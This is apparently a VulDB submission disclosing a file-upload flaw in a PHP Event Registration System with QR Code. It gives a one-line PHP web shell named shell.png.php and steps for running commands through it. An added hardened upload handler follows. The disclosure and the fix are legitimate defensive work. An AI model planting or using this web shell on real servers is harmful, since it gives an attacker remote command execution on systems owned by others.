Submission #53589: OS command injection via File Upload in Event Registration System with QR Code

Title: OS command injection via File Upload in Event Registration System with QR Code

Description:
# Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache

Description:-
An OS command injection via File Upload issue in Event Registration System with QR Code App v.1.0 allows to inject OS command injection which can lead to all internal files in the system

Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>

Steps:
1) Login as ADMIN
2) Now go to http://localhost/event/admin/?page=user/list and add user
3) Now fill the details and upload a malicious file.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
4) Now save the user
5) Open the image in new tab and in the above url type the below command
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) As we can see the OS command injection has been executed
User: lucifoxer001 (UID 33693)
Submission: 26/11/2022 03:26 PM (4 years ago)
Moderation: 30/11/2022 11:50 AM (4 days later)
Status: Accepted
VulDB Entry: 214590 [SourceCodester Event Registration System 1.0 cmd privilege escalation]
Points: 17
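
A hardened upload handler for the flaw described in this submission, as an added example that is not part of the submission or the vendor's code. The function name store_avatar, the allowlist and the size limit are assumptions; the handler decides the file type from its content and stores it under a server-generated name, so the client-supplied name never reaches the disk.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical hardened upload handler, not the application's code.
// The allowlist maps the MIME type detected from file content to the only
// extension the stored file is allowed to carry.
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validates one entry of $_FILES and stores it under a server-generated name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 */
function store_avatar(array $file, string $destDir, int $maxBytes = 2097152): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = (string) $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > $maxBytes) {
        throw new RuntimeException('not an uploaded file or too large');
    }
    // Decide the type from the bytes, never from $file['name'] or $file['type']:
    // both are client-controlled, as the "shell.png.php" name above shows.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime]) || @getimagesize($tmp) === false) {
        throw new RuntimeException('file is not an allowed image');
    }
    // Server-generated name with a single allowlisted extension: the client
    // file name is discarded, so a trailing ".php" cannot be written to disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
```

Serving the uploads directory with PHP handling disabled in the web server configuration covers the case where a script file still ends up there.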
